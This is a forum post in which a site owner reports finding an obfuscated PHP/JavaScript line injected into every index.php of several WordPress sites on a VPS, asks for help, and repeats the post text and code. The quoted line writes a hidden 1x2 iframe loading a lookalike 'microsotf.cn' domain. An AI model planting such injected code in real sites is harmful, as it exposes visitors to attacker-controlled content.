So...yea. Hoping someone better at this type of thing can help me out. I found the following line of code at the bottom of all index.php files for a wordpress install.
\<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
As near I can tell, its trying to throw up a 1x2 pixeled iframe for microsotf.cn ? Apparently that site was just registered on the first of this month, and the ip is in russia.
I only found it because my site threw up a php error when I visited it, and then I found that those files had been modified today. Found 2 other sites on my vps with the same issue. Other than the vps, the only similarities between the 3 are that they're all wordpress installed phpbay sites, but that's true for a couple other sites on my vps as well...
Anyone mind helping out with whatever comes to mind?
\<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
As near I can tell, its trying to throw up a 1x2 pixeled iframe for microsotf.cn ? Apparently that site was just registered on the first of this month, and the ip is in russia.
I only found it because my site threw up a php error when I visited it, and then I found that those files had been modified today. Found 2 other sites on my vps with the same issue. Other than the vps, the only similarities between the 3 are that they're all wordpress installed phpbay sites, but that's true for a couple other sites on my vps as well...
Anyone mind helping out with whatever comes to mind?